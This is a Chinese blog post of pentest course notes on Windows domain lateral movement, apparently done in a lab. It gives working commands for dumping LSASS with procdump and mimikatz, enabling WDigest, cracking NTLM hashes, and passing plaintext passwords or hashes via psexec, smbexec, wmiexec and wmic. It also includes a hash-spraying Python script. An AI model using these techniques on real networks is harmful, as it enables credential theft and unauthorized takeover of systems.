第67天-内网安全-域横向smb&wmi明文或hash传递

已于 2022-05-22 16:59:53 修改
阅读量973 收藏 3
点赞数
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: 安全 哈希算法 web安全 windows
于 2022-05-12 11:34:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/124727707
版权

思维导图

67-1

67-2

知识点

无法获取明文密码:

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本若安装KB2871997补丁,同样也会导致无法获取明文密码

针对以上情况,我们提供了4种方式解决此类问题

  • 1.利用哈希hash传递(pth,ptk等)进行移动

  • 2.利用其它服务协议(SMB,WMI等)进行哈希移动

  • 3.利用注册表操作开启Wdigest Auth值进行获取

    • 注册表操作开启Wdigest Auth值

      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

  • 4.利用工具或第三方平台(Hachcat)进行破解获取

    • 在线hash解密
    • hash破解工具

windows-hash加密算法

Windows系统LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash。

域用户与本地用户的区别

  • god/administrator是域用户
  • ./administrator是本地用户

演示案例:

案例 1-Procdump+Mimikatz 配合获取

Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(dmp文件),使用本地的Mimikatz打开Procdump获取的用户信息。

  • Procdump下载:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
  • mimikatz下载:https://github.com/gentilkiwi/mimikatz/releases
procdump 配合 mimikatz
procdump -accepteula -ma lsass.exe lsass.dmp

mimikatz 上执行:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

案例2:Hashcat破解获取Windows NTML Hash

密码破解全能工具:Hashcat密码破解攻略 - FreeBuf网络安全行业门户

hashcat -a 0-m 1000 hash file --force

案例3:域横向移动SMB服务利用-psexec,smbexec

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。

psexec工具:
  • 在微软官方Pstools工具包中,但是官方Pstools中的psexec只能明文连接,无法采用hash连接。
  • 如果需要hash连接,可以使用impacket工具包中的psexec,但是impacket非官方自带,容易被杀。
  • Pstools官方工具包:
    • https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
psexec第一种::ADMINISTRATOR

先有ipc链接,psexec需要明文或hash传递

net use \\192.168.3.32\ipc$  "admin!@#45" /user :administrator
psexec \\192.168.3.32 -s cmd  # 需要先有ipc链接 -s以System权限运行CMD

psexec第二种:

不用建立IPC直接提供明文账户密码(推荐)

psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
psexec -hashes :$HASH$ ./administrator @10.1.2.3
psexec  -hashes :$HASH$ domain/administrator @10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator @192.168.3.32

利用明文成功

利用hash失败,微软官方Pstools工具包中的psexec无法采用hash连接,只能明文连接。

smbexec工具:
  • 非官方自带-参考impacket工具包使用,操作简单,容易被杀
  • impacket工具包:
    • https://gitee.com/RichChigga/impacket-examples-windows
    • https://github.com/SecureAuthCorp/impacket
smbexec

无需先建立ipc链接、 明文或hash传递

smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

利用明文成功

利用hash成功

案例4:域横向移动 WMI 服务利用-cscript,wmiexec,wmic

WMI (Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹

自带WMIC
  • 明文传递
  • 优点是自带工具,不用考虑免杀
  • 缺点是无回显, 需要想方法读取结果。
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"
wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c ipconfig >C:\1.txt"

67-11

自带cscript
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

套件impacket —wmiexec

  • 明文或hash传递
  • 有回显exe版本
  • 缺点:易被杀
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

明文传递

hash传递

案例5:域横向移动以上服务 hash 批量利用-python 编译 exe

信息收集
mimikatz收集到密码hash
518b98ad4178a53695dc997aa02d455c

探测网段域内主机
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I |findstr "TTL="


192.168.3.21
192.168.3.25
192.168.3.29
192.168.3.30
192.168.3.31
192.168.3.32
域内用户
net user / domain


Administrator
boss
dbadmin 
debian
devadmain
fedora
fi1eadmin
Guest
hr
itadmin 
jenkins 
kali
k1ion
k1ionsec
krbtgt
1iandy
logers
logtest
mack
mary
SM6ef9b5ce41 4946ae9
SM_c330a5709f6a478b8
SM_d3853544b62a421 fb
SM_d80bb46e751 64f258
upnadm
webadmin
脚本批量利用

至此,我们已经收集到了IP,用户名,和密码hash。我们可以写一个python脚本批量利用。

import os,time
 
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.32'
}
 
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'webadmin'
}
 
hashs={
#'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}
 
for ip in ips:
    for user in users:
        for mimahash in hashs:
            #域用户和本地用户都试试
            #wmiexec -hashes :hash god/user@ip whoami
            #wmiexec -hashes :hash ./user@ip whoami
            exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
            exec1 = "wmiexec -hashes :"+mimahash+" ./"+user+"@"+ip+" whoami"
            print('--->' + exec + '<---')
            print('--->' + exec1 + '<---')
            os.system(exec)
            os.system(exec1)
            time.sleep(0.5)

编译成exe文件

pyinstaller -F fuck_neiwang_002.py

执行exe

192.168.3.29 hash可用

192.168.3.32 hash可用

后面继续信息收集,更新hash字典,再渗透。

涉及资源

https://github.com/hashcat/hashcat

https://www.freebuf.com/sectool/164507.html

https://github.com/gentilkiwi/mimikatz/releases

https://github.com/SecureAuthCorp/impacket

https://gitee.com/RichChigga/impacket-examples-windows

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

https://github.com/k8gege/K8tools

https://www.cnblogs.com/-qing-/p/10661480.html

IsecNoob
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透哈希传递攻击
zzlx123的博客
12-18 1875
条件:获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash),这个利用跟工作组环境或者环境无关。 这个网站提供对密码转换成 LM-Hash 和 NTLM...
内网安全横向smb&wmi明文hash传递
_Co1a
09-12 1078
下面讲的是psexec&smbexec以及wimc&wmiexec 知识点1: windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,提供了4钟方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启wdigest Auth值进行...
内网渗透】横向smb&wmi明文hash传递
ssrf
03-07 1367
目录0x001 Procdump+Mimikatz配合获取用户信息0x002 无法获取明文密码解决方案1)hashcat暴力破解2)注册表操作开启Wdigest Auth值3)SMB服务协议进行哈希移动4)WMI服务利用-cscript,wmiexec,wmic 0x001 Procdump+Mimikatz配合获取用户信息 Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地
内网安全-横向smb&wmi明文hash传递
xhscxj的博客
03-11 3751
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(path,ptk等)进行移动 2.利用其他服务协议(SMBWMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台(Hachcat)进行破解获取 ...
横向移动 -基于smb&wmi 明文hash 传递
mingyqf的博客
11-10 801
内网 横向 smb&wmi 明文hash 传递 演示案例:  Procdump+Mimikatz 配合获取  Hashcat 破解获取 Windows NTML Hash横向移动 SMB 服务利用-psexec,smbexec  横向移动 WMI 服务利用-cscript,wmiexec,wmic  横向移动以上服务 hash 批量利用-python 编译 exe 案例 1-Procdump+Mimikatz 配合获取 1.1procdump 配合 mimikatz
dotnet-InvokeTheHash是一个可以执行WMISMB命令的PowerShell脚本
08-15
在.NET开发领安全相关的工具和技术不断演进,其中Invoke-TheHash是一个极具特色的PowerShell脚本,它允许开发者或者安全研究人员通过WMIWindows Management Instrumentation)和SMB(Server Message Block)...
clevo-xsm-wmi:https的克隆
05-11
clevo-xsm-wmi 用于Clevo SM系列笔记本电脑的键盘背光的内核模块。 (以及几种EM / ZM / DM系列型号) 基于TUXEDO Computers GmbH创建的tuxedo-wmi。 在tuxedo-wmi上的添加 Sysfs界面可在模块加载后控制亮度,...
go-wmi-hyper-v.txt
09-28
go通过调用Windows wmi 生成hyper-v虚拟机,不包括修改内存,CPU等操作
WMI-Class-Library.zip_WMI Class_wmi
09-23
**Windows Management Instrumentation (WMI) 是 Windows 操作系统中一个强大的管理工具,它提供了对系统、网络和服务的深入监控和配置能力。WMI 类库是实现这一功能的基础,它包含了一系列预定义的类和接口,允许...
VB-WMI.rar_VB WMI_wmi vb
09-23
VB-WMI编程是一种在Visual Basic (VB) 中利用Windows Management Instrumentation (WMI) 技术来管理系统资源的方法。WMI是微软提供的一个强大的管理工具,它允许开发者通过编程方式获取和控制本地或远程计算机上的...
内网横向渗透之各种传递攻击
技术超强的网络安全平台
05-06 2206
内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文hash传递攻击进行横向渗透。 横向渗透 在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 PsExec 最强大的功能之一是在远程系统和远程支持
[内网渗透]—权限维持
Sentiment的博客
12-16 902
当拿到控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入控制器的 lsass.exe 进程,这样会在内的所有账号中添加一个 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。PS:由于注入到lsass.exe进程中,所以每次关机后就不存在了,但一般在真正的环境中,控在很长一段时间内是不会重启的,因此可以作为权限维持的一种方式。
网络安全内用户Hash获取方式
kali_Ma的博客
12-05 1298
在渗透测试的过程中,当我们已经是管权限时,就可以实现提取所有内用户的密码哈希以进行离线破解和分析,这是非常常见的一个操作,这些哈希值存储在控制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如用户名、散列值、组、GPP、OU等于活动目录相关的信息,它和SAM文件一样都是被操作系统锁定的,因此无法直接复制到其他位置以提取信息。NTDS.dit文件位于Windows以下位置: NTDSUTIL是一个命令行工具,它是控制器生态系统的一部分,其目的是为了使管理员能够访问和管理Windows Ac
kali密码攻击之——哈希传递攻击
The__Apollo的博客
04-22 7236
passing the hash,中文一般翻译为hash传递攻击,在windows系统中,系统通常不会存储用户登录密码,而是存储密码的哈希值,在我们远程登录系统的时候,实际上向远程传递的就是密码的hash值。当攻击者获取了存储在计算机上的用户名和密码的hash值的时候,他虽然不知道密码值,但是仍然可以通过直接连接远程主机,通过传送密码的hash值来达到登录的目的。passing the hash套件
Windows NTLM HashHash传递、Key传递攻击
weixin_30563917的博客
07-04 1951
Hash(Key) 获取 工具: Mimikatz 用法: .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash明文密码(如果可以的话) sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx...
凭据传递攻击(Path The Hash)
痴人说梦梦中人
01-29 3797
一、PTH简介        哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。 二、ColbaltStrike实现PTH 获取hash
第68-内网安全-横向 PTH&PTK&PTT 哈希票据传
MCTSOG的博客
05-18 893
思维导图 知识点 Kerberos 协议 具体工作方法,在中,简要介绍一下: 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket) 将 TGT 进行加密签名返回给客户机器,只有用户 krbtgt 才能读 取 kerberos 中 TGT 数据 然后客户机将 TGT 发送给控制器 KDC 请求 TGS(票证授权服务)票证,并且对
渗透-横向移动(PTH)
m0_58606546的博客
11-20 271
一:Windows本地认证 ***基础知识*** Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,内用户的密码hash是存在控的NTDS.DIT文件里面。 SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。 ***密码格式*** Administrator:500:AAD3B435B5
一文理解 Windows 身份验证原理
qq_28205153的博客
08-19 6426
身份验证是用于验证对象或个人身份的过程。对对象进行身份验证时,目标是验证该对象是真实的。在对某人进行身份验证时,目标是验证该人不是冒名顶替者。 在网络环境中,身份验证是向网络应用程序或资源证明身份的行为。通常,通过使用仅用户知道的密钥(如公共密钥密码学)或共享密钥的加密操作来证明身份。身份验证交换的服务器端将签名的数据与已知的加密密钥进行比较,以验证身份验证尝试。 Windows操作系统实现了一组默认的身份验证协议,包括Kerberos、NTLM、传输层安全性/安全套接字层(TLS / SSL)和摘要,作为
WS-Management 服务无法处理该请求。WMI 服务或 WM! 提供程宇返回未知错误:HRESULT 0x80070964
最新发布
05-25
这个错误通常表示在尝试访问远程计算机上的 WMI 服务时出现问题。可能的原因如下: 1. 计算机上的 Windows 防火墙或其他防火墙软件阻止了对 WMI 的访问。 2. WMI 服务本身遇到了问题,可能是由于配置错误或无效的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值